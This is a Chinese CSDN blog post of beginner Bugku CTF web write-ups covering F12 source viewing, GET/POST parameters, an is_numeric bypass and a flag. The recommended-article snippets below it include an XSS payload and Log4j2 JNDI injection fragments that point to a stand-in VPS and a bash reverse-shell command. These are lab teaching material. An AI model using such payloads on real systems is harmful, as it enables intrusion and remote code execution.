WEB1.2--bugku

最新推荐文章于 2024-06-29 13:42:41 发布
最新推荐文章于 2024-06-29 13:42:41 发布
阅读量134 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wwwwxiaobai/article/details/100146354
版权

web2
打开连接后是一堆笑脸,直接f12查看就能得到flag
在这里插入图片描述
计算器:
直接f12修改输入框长度:
在这里插入图片描述
得到flag
在这里插入图片描述
$_GET:

在这里插入图片描述
打开题目就是这样的直白,因为是基础题所以也没有什么绕弯弯
1.GET请求获取what的值并赋值给变量$what
2.当变量$what==flag时就获得flag
在这里插入图片描述
$_POST:
跟上一题的方式是差不多的
在这里插入图片描述
矛盾:
在这里插入图片描述

依然是非常的直白
1.isnumeric( )函数检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。
2.这里的矛盾应该就是变量$num要不是只有有数字的字符串就可以,所以很简单就能得到flag
在这里插入图片描述
web3:
打开后是无尽的弹框,查看源码后会发现flag确实就在那里
在这里插入图片描述
用html解码就获得flag KEY{J2sa42ahJK-HS11III}

wwwwxiaobai
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
bugku Web write up 二
0verWatch的博客
02-20 7283
XSS 先来最简单的弹窗 ?id=<srcipt>altert(/xss/)</script> 查看源码 发现<>被过滤掉了 这里学到一个技巧,就是用Unicode编码绕过 payload:?id=\u003cimg src=1 onerror=alert(_key_)\u003e 速度要快 这种题就是编程题 上脚本,注意这题是用m...
Bugku解题 web 【四】
weixin_46703850的博客
04-04 1637
Bugku解题 web28.web1929.聪明的php 介绍:记录解题过程
CTF学习(入门):Bugku--web篇--矛盾
m0_45157173的博客
11-15 1442
CTF学习(入门):Bugkuweb篇–矛盾 http://123.206.87.240:8002/get/index1.php 涉及操作:PHP黑魔法、特殊情况下的=号判定 进入目标网站: 解读代码: get一个num, 若num不是数字, 出一次num的值,后若num=1 出flag; 若num为数字则不进行任何操作 所以要输出flag,首先要num不是数字,然后又要num=1 这显然是矛盾的。 单纯使num=1或=a结果如下: 这就只能用num的一个特性: 对1加一个字符,如“1a”、“1-”,
bugku web-Apache Log4j2 RCE
weixin_46578840的博客
01-29 2978
一,准备环境 有VPS即可 二,题解 1,根据提示,/bin/bash:x,带x的是无法执行的(包括base64编码),打勾的是可以执行的 2,注意 首先VPS上要装有java环境和工具,这里我用的是JNDIExploit-1.2-SNAPSHOT.jar 2.2 vps先允许反弹shell用到的端口2.3,再启动工具 2.4,再开一个窗口监听nc 2.5,构造payload,根据提示进行利用 将地址改为自己的vps地址,然后将加密后的命令放到末尾 原:${jndi:ldap://x.x.x.x:1389
bugku linux基础,bugkuwebweb基础$_GET和web基础$_POST 以及Linux操作系统学习(一)操作系统概述...
weixin_29374899的博客
05-13 201
这篇博客由于基本是手打的,所以可能会有一些错误,还请在评论处指正。web基础$_GET1.本题为GET传参,直接在url后面加参数,读php代码,如果what=flag,则打印出flag。 2. 在url中添加?what=flag,出现flag。 web基础$_POST1.查看代码,通过post传入一个参数what,如果what的值等于flag,则打印出flag。 2.打开HackBar插件,勾选...
Bugku WEB Apache Log4j2 RCE
qq_41696858的博客
12-13 1964
bugku最近上新了一题log4j2的题,紧跟时代,刷一刷 先简单说一下这个漏洞的原理吧,本质是JNDI注入 需要说的是,这题需要弹VPS,也就是你得有公网IP 通过构造形如${jndi:ldap:}或者${jndi:rmi}之类的恶意payload,可以造成任意命令执行漏洞 防护的常用思路:更新apache2 log4j2版本到2.15以上 一般来说可能造成此漏洞的API包括但不限于logger.info(),logger.error() 具体的调用链可以看这篇https://www.anquanke.c
攻防世界-WEB-catcat-new
m0_52061428的博客
06-29 602
第一段我们确定了flag,第二段我们知道了/admin确实有做限制,只有当session获取admin=1时才能获取flag 又因为flask存在session可以被伪造的问题,所以我们接下来要做的就是伪造session从而获取flag
web | CTF】BugKu CTF Simple_SSTI_1 和 2
weixin_46301214的博客
02-21 402
一打开题目就告诉你输入flag参数,而且你输入什么就输出什么。很明显就是模板注入,Python的web框架独有的漏洞。那就简单,去查一下payload,一把梭。原理也不解释,就是拿poc一把梭。输入:1 输出:1。
Log4j2_RCE漏洞复现
Le1a's Blog
12-16 2005
log4j2_RCE漏洞复现 这里是用了两种工具来复现漏洞 JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar方法 靶机地址:http://vulfocus.fofa.so/ 工具地址:https://www.lanzoup.com/i8Aa4xo5gmf 密码:Le1a 访问靶机地址 先把 工具上传到VPS上,然后运行 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,(b
tomcat-redis-session-manager-1.2-tomcat-7-java-7
06-04
总之,"tomcat-redis-session-manager-1.2-tomcat-7-java-7"这个组件为Tomcat提供了一种利用Redis存储session的解决方案,通过Apache Commons Pool和Jedis实现了连接管理和通信,从而提高了Web应用的可扩展性和健壮...
javapms-1.2-beta
07-18
4. `javapms-1.2-beta\ROOT\WEB-INF\lucene\segments_3`: 这表明项目可能使用了Apache Lucene,一个Java全文搜索引擎库,用于索引和搜索数据。`segments_3`是Lucene存储索引的部分。 5. `javapms-1.2-beta\ROOT\WEB...
sslext 1.2-0
05-30
综上所述,SSLEXT 1.2-0为Struts框架带来了安全增强,使得开发者能够更加灵活地管理和保护Web应用的数据传输安全。正确理解和使用这个扩展,可以提升应用的整体安全性,为用户提供更加可靠的服务。
ace-v1.2--bs-v3.0.0
07-22
"ace-v1.2--bs-v3.0.0"是一个知名的后台管理模板,它结合了Ace Admin V1.2和Bootstrap V3.0.0的强大力量,为开发者提供了一个高效、功能丰富的框架来构建企业级的Web应用程序。这个模板主要针对那些希望快速搭建后台...
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
07-17
2024年欧洲铝桁架市场主要企业市场占有率及排名.docx
torchaudio-0.13.1+cpu-cp39-cp39-win_amd64.whl
最新发布
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
出入库存盘点表-图表分析-分类查询-Excel模板
07-17
【作品名称】:出入库存盘点表-图表分析-分类查询-Excel模板 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
torchaudio-0.12.1+cpu-cp37-cp37m-win_amd64.whl
07-17
torchaudio软件包,直接下载下来,通过命令窗口输入:pip install torchaudio-xxx.whl安装就行,再也不怕pip安装timeout了
中南大学机械设计课程设计说明书.doc
07-17
说明书
tomcat-redis-session-manager-1.2-tomcat-7.jar下载
07-15
要下载tomcat-redis-session-manager-1.2-tomcat-7.jar,您可以按照以下步骤进行操作: 1. 打开您的网络浏览器,进入您通常使用的搜索引擎网站,如Google或百度。 2. 在搜索框中输入“tomcat-redis-session-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值